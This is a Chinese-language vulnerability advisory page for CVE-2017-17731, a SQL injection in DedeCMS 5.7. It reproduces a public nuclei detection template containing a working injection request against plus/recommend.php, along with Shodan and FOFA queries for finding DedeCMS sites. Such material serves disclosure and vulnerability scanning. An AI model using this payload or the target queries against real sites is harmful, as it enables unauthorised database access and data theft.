CVE-2017-17731: DedeCMS 5.7 - SQL Injection

日期: 2025-08-01 | 影响软件: DedeCMS | POC: 已公开

漏洞描述

DedeCMS through 5.7 has SQL Injection via the $_FILES superglobal to plus/recommend.php.

PoC代码[已公开]

id: CVE-2017-17731

info:
  name: DedeCMS 5.7 - SQL Injection
  author: j4vaovo
  severity: critical
  description: |
    DedeCMS through 5.7 has SQL Injection via the $_FILES superglobal to plus/recommend.php.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
  remediation: |
    Apply the latest security patch or upgrade to a newer version of DedeCMS to mitigate the SQL Injection vulnerability.
  reference:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17731
    - https://nvd.nist.gov/vuln/detail/CVE-2017-17731
    - https://blog.csdn.net/nixawk/article/details/24982851
    - https://github.com/Lucifer1993/AngelSword/blob/232258e42201373fef1f323864366dc1499581fc/cms/dedecms/dedecms_recommend_sqli.py#L25
    - https://github.com/20142995/Goby
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2017-17731
    cwe-id: CWE-89
    epss-score: 0.86435
    epss-percentile: 0.99373
    cpe: cpe:2.3:a:dedecms:dedecms:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: dedecms
    product: dedecms
    shodan-query:
      - http.html:"DedeCms"
      - cpe:"cpe:2.3:a:dedecms:dedecms"
      - http.html:"dedecms"
    fofa-query:
      - app="DedeCMS"
      - app="dedecms"
      - body="dedecms"
  tags: cve,cve2017,sqli,dedecms
variables:
  num: "999999999"

http:
  - method: GET
    path:
      - '{{BaseURL}}/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@`\%27`%20/*!50000union*//*!50000select*/1,2,3,md5({{num}}),5,6,7,8,9%23@`\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{{md5({{num}})}}'

      - type: status
        status:
          - 200
# digest: 490a00463044022020e84335692f238c077be74470ab0ab06b250cb6dc817a19cdd97dc1977fa3d2022057efba73c746ef3db2872b91e0ea8182be06b6e3c0b0d16429afa2595467aa71:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2017/CVE-2017-17731.yaml

相关漏洞推荐